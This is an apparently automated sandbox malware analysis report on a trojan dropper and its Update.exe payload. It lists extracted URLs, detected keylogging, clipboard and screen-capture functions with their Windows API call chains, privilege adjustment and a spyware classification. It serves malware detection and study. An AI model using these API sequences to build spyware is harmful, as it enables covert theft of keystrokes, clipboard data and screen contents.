                      Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000007024000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1809275704.0000000000990000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, backup.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000007024000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1809275704.0000000000990000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, backup.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                      Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000007024000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1809275704.0000000000990000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, backup.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: backup.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000007024000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1809275704.0000000000990000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, backup.exe.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                      Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.dll.0.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                      Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.dll.0.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                      Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.dll.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                      Source: 360inst_install.exe.0.drString found in binary or memory: http://down.360safe.com/setup.exePathSOFTWARE
                      Source: 360inst_install.exe.0.drString found in binary or memory: http://down.360safe.com/setup.exehttp://down.360safe.com/setupbeta.exe
                      Source: 360inst_install.exe.0.drString found in binary or memory: http://down.360safe.com/setup.exehttp://down.360safe.com/setupbeta.exeh
                      Source: 360inst_install.exe.0.drString found in binary or memory: http://hao.360.com
                      Source: 360inst_install.exe.0.drString found in binary or memory: http://home.arcor.de/starwalker22/Test/UrlExtractDemo.cab
                      Source: powershell.exe, 00000012.00000002.2634350577.0000000005DB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2643287383.00000000059E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.dll.0.drString found in binary or memory: http://ocsp.comodoca.com0
                      Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000007024000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1809275704.0000000000990000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, backup.exe.3.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000007024000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1809275704.0000000000990000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, backup.exe.3.drString found in binary or memory: http://ocsp.digicert.com0A
                      Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000007024000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1809275704.0000000000990000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, backup.exe.3.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000007024000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1809275704.0000000000990000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, backup.exe.3.drString found in binary or memory: http://ocsp.digicert.com0X
                      Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                      Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                      Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                      Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.dll.0.drString found in binary or memory: http://ocsp.sectigo.com0
                      Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                      Source: powershell.exe, 00000013.00000002.2633221267.0000000004AD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drString found in binary or memory: http://pinst.360.cn/360haohua/safe_chaoqiang.cab?
                      Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drString found in binary or memory: http://pinst.360.cn/360safe/h_inst.cab
                      Source: 360inst_install.exe.0.drString found in binary or memory: http://pinst.360.cn/360se/wssj_setup.cab
                      Source: 360inst_install.exe.0.drString found in binary or memory: http://pinst.360.cn/zhuomian/desktopsafe.cab
                      Source: 360inst_install.exe.0.drString found in binary or memory: http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10&http://s.360.cn/safe/instcomp
                      Source: powershell.exe, 00000012.00000002.2632273712.0000000004EA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2633221267.0000000005144000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2633221267.0000000004AD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: powershell.exe, 00000012.00000002.2632273712.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2633221267.0000000004981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000012.00000002.2632273712.0000000004EA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2633221267.0000000005144000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2633221267.0000000004AD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                      Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                      Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                      Source: 360inst_install.exe.0.drString found in binary or memory: http://sfdw.360safe.com/safesetup_2000.exe360
                      Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drString found in binary or memory: http://sfdw.360safe.com/setup.exe.exe
                      Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drString found in binary or memory: http://sfdw.360safe.com/setupbeta.exe4(u7b4N
                      Source: 360inst_install.exe.0.drString found in binary or memory: http://sfdw.360safe.com/superkiller/superkillerexe_880765522ded7527821ce7448af08018_5.1.64.1181.cabh
                      Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drString found in binary or memory: http://www.360.cn/xukexieyi.html#360
                      Source: powershell.exe, 00000013.00000002.2633221267.0000000004AD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000007024000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1809275704.0000000000990000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002F86000.00000004.00000020.00020000.00000000.sdmp, Update.exe.0.dr, backup.exe.3.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: powershell.exe, 00000012.00000002.2632273712.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2633221267.0000000004981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                      Source: powershell.exe, 00000012.00000002.2632273712.0000000004EA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                      Source: 360inst_install.exe.0.drString found in binary or memory: https://bbs.360.cn/thread-16079507-1-1.htmlD
                      Source: powershell.exe, 00000013.00000002.2643287383.00000000059E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000013.00000002.2643287383.00000000059E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000013.00000002.2643287383.00000000059E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 00000013.00000002.2633221267.0000000004AD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: 360inst_install.exe.0.drString found in binary or memory: https://hao.360.cn/?installerhttps://hao.360.cnhttps://http://https://hao.360.cn/%s
                      Source: powershell.exe, 00000012.00000002.2634350577.0000000005DB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2643287383.00000000059E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.dll.0.drString found in binary or memory: https://sectigo.com/CPS0
                      Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/0

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to capture and log keystrokes
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: [esc]3_2_034EE850
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: [esc]3_2_034EE850
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: [esc]3_2_034EE850
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: [esc]3_2_034EE850
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_034EE850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,3_2_034EE850
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_034EE850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,3_2_034EE850
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_034EBC70 GetDesktopWindow,GetDC,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,_memset,GetDIBits,_memset,DeleteObject,DeleteObject,ReleaseDC,DeleteObject,DeleteObject,ReleaseDC,3_2_034EBC70
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_034EE4F0 Sleep,CreateMutexW,GetLastError,SHGetFolderPathW,lstrcatW,CreateMutexW,WaitForSingleObject,CreateFileW,GetFileSize,CloseHandle,DeleteFileW,ReleaseMutex,DirectInput8Create,GetTickCount,GetKeyState,3_2_034EE4F0
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeWindows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dllJump to behavior
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C376EB0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,CryptReleaseContext,___std_exception_copy,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,___std_exception_copy,3_2_6C376EB0
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_034EB463 ExitWindowsEx,3_2_034EB463
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_034EB41B ExitWindowsEx,3_2_034EB41B
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_034EB43F ExitWindowsEx,3_2_034EB43F
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeCode function: 0_2_00404FAA0_2_00404FAA
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeCode function: 0_2_0041206B0_2_0041206B
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeCode function: 0_2_0041022D0_2_0041022D
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeCode function: 0_2_00411F910_2_00411F91
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_034E6EE03_2_034E6EE0
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_034E6C503_2_034E6C50
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_034FE3413_2_034FE341
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_034F83813_2_034F8381
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_034FEA1D3_2_034FEA1D
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_034E89003_2_034E8900
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_034FF9FF3_2_034FF9FF
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_034FD89F3_2_034FD89F
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_034FDDF03_2_034FDDF0
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_034E24B03_2_034E24B0
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C377E803_2_6C377E80
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C3825763_2_6C382576
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C390D623_2_6C390D62
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C3A2ED33_2_6C3A2ED3
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C3828703_2_6C382870
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C3958B03_2_6C3958B0
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C382A4B3_2_6C382A4B
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C38DBA03_2_6C38DBA0
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C382BC63_2_6C382BC6
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C38C5153_2_6C38C515
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C3A75023_2_6C3A7502
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C3826383_2_6C382638
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C3776403_2_6C377640
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C3827713_2_6C382771
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C3857A03_2_6C3857A0
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_6C3962343_2_6C396234
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_1001122F3_2_1001122F
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_100024B03_2_100024B0
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_10010CDE3_2_10010CDE
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_10012D913_2_10012D91
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_10011E5C3_2_10011E5C
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_1000B66A3_2_1000B66A
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_100117803_2_10011780
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_009100323_2_00910032
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_009212063_2_00921206
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_009124873_2_00912487
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_00920CB53_2_00920CB5
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_00922D683_2_00922D68
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0091B6413_2_0091B641
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_009217573_2_00921757
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0305F3BE3_2_0305F3BE
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0305D25E3_2_0305D25E
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_030482BF3_2_030482BF
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0304689F3_2_0304689F
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0305D7AF3_2_0305D7AF
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0304660F3_2_0304660F
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_03041E6F3_2_03041E6F
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_0305DD003_2_0305DD00
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_03057D403_2_03057D40
                      Source: Joe Sandbox ViewDropped File: C:\Users\Public\Bilite\360inst_install.exe B35314C2C3B1AAB777D621C6FD8516A877B27EFBDE4DD4ADDD6843C411E96AA3
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: String function: 034F4300 appears 32 times
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: String function: 6C38C970 appears 53 times
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeCode function: String function: 0040243B appears 37 times
                      Source: ErbgterT2R.exeStatic PE information: invalid certificate
                      Source: 360inst_install.exe.0.drStatic PE information: Resource name: CAB type: Microsoft Cabinet archive data, many, 1346052 bytes, 3 files, at 0x2c +A "sites.dll" +A "themes\theme_NewInstallAir.xml", number 1, 81 datablocks, 0x1 compression
                      Source: 360inst_install.exe.0.drStatic PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 304652 bytes, 1 file, at 0x2c +A "360P2SP.dll", ID 808, number 1, 22 datablocks, 0x1503 compression
                      Source: 360inst_install.exe.0.drStatic PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 348915 bytes, 1 file, at 0x2c +A "urlproc.dll", number 1, 22 datablocks, 0x1 compression
                      Source: 360inst_install.exe.0.drStatic PE information: Resource name: LETTER type: Microsoft Cabinet archive data, Windows 2000/XP setup, 781 bytes, 1 file, at 0x2c +A "letter.rtf", number 1, 1 datablock, 0x1 compression
                      Source: 360inst_install.exe.0.drStatic PE information: Resource name: LICENCE type: Microsoft Cabinet archive data, Windows 2000/XP setup, 12165 bytes, 1 file, at 0x2c +A "licence.rtf", number 1, 2 datablocks, 0x1 compression
                      Source: 360inst_install.exe.0.drStatic PE information: Resource name: PRIVACY type: Microsoft Cabinet archive data, Windows 2000/XP setup, 11763 bytes, 1 file, at 0x2c +A "privacy.rtf", number 1, 1 datablock, 0x1 compression
                      Source: 360inst_install.exe.0.drStatic PE information: Resource name: VIEWER type: Microsoft Cabinet archive data, Windows 2000/XP setup, 751718 bytes, 1 file, at 0x2c +A "AgreementViewer.exe", number 1, 53 datablocks, 0x1 compression
                      Source: ErbgterT2R.exe, 00000000.00000003.1711457163.00000000024ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename7ZSfxMod_x86.exe< vs ErbgterT2R.exe
                      Source: ErbgterT2R.exe, 00000000.00000003.1711457163.00000000024ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename7zSfxNew.exe< vs ErbgterT2R.exe
                      Source: ErbgterT2R.exe, 00000000.00000000.1710480106.0000000000432000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename7ZSfxMod_x86.exe< vs ErbgterT2R.exe
                      Source: ErbgterT2R.exe, 00000000.00000000.1710480106.0000000000432000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename7zSfxNew.exe< vs ErbgterT2R.exe
                      Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAxII> vs ErbgterT2R.exe
                      Source: ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUpdate.exe vs ErbgterT2R.exe
                      Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAxII> vs ErbgterT2R.exe
                      Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUpdate.exe vs ErbgterT2R.exe
                      Source: ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename360Installer.exe> vs ErbgterT2R.exe
                      Source: ErbgterT2R.exeBinary or memory string: OriginalFilename7ZSfxMod_x86.exe< vs ErbgterT2R.exe
                      Source: ErbgterT2R.exeBinary or memory string: OriginalFilename7zSfxNew.exe< vs ErbgterT2R.exe
                      Source: ErbgterT2R.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 360inst_install.exe.0.drBinary string: ZOTAC ZENFASTZENFAS XSTAR XS TAK VASEKY UKINGS TYH TXRUI TURXUN TEKISM TEELKOOUTAISU SS DSUPERSSPSTARSWAYSTARRAM SPCC SHINEDOE SHINEDIS SHINEDISKSAMSWEETREEINNO REEINN RUNENG RAMSTA S QIDAN POWERSSD NETAC SSNETAC SMICROFLA SH MICROFLASH MICROFLAS MERELAIR MAXSUNMACMEMOR LENOVO SLENOVO SLANSHIKUAIKAKINGSTEKKINGSSD_ACSC4MACSC2MACJC2MKINGSPECKINGSHARE KINGSHAR EKING SHAREKING SHAREKING SHA REKINGSANDKINGRICHKINGBANKKINGDINGKINGDIANKDATAJUNSHI INTEIFUNKIFOUNDI-FLASHHY SPEED HY SDEED HISTOR HIGHXGOWE GEIL ZENITHGAMERGALAIRD GALA GAINWARDGLOWAYGLOWA FORSAFASTDISKFASPEE FASPEEDEVTRANEEKOOEAGET SS DDOMONDERLERDRAGONDICABOFITBIOSTAR BIOSTA ASGARD ASINT ASIN APACER ANUCELL GENERIC NCARDHYNIXTECLASTTECLAS KINGFAST COLORFUL COLORFUL SSD NVME ATA KINGSTONPLEXTOR PX-PLEXTO PX-PLEXTO PX-GALAXMICRON MICRON_MLITEONITLITEONSANDISK SANDIS MKNSSDCRUNCOREEDGEPLEXTORMTFDV4-CTM4-CTCRUCIAL ADATA ADATA ADAT PNYAPACERG.SKILLOCZKINGSTONCORSAIRINTELFUJITSUTOSHIB TOSHIBASAMXUNG SAMSUNG1SAMSUN SAMSUNGWDSEAGATESTATA AVD ASDK APPLE HDD ModelASSOCIATORS OF {Win32_DiskPartition.DeviceID='%s'} where ResultClass = Win32_DiskDriveDeviceIDASSOCIATORS OF {Win32_LogicalDisk.DeviceID='%s'} where ResultClass = Win32_DiskPartitionROOT\CIMV2Index\Device\Harddisk\\.\c:%usotmSOFTWARE\360Safe\softmgr\dg{from}{ver}{mid}s.360.cn/safe/instcomp.htm?soft=425&status=%d&mid={mid}&from={from}&ver={ver}&vv=10&appkey=&usetime=%d&downrate=%d&downlen=%dl,M~UG
                      Source: ndtidaod.png.0.drBinary or memory string: h.vbP
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@43/29@0/1
                      Source: C:\Users\user\Desktop\ErbgterT2R.exeCode function: 0_2_00407776 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,0_2_00407776
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_034E7B70 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,3_2_034E7B70
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_034E7740 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,3_2_034E7740
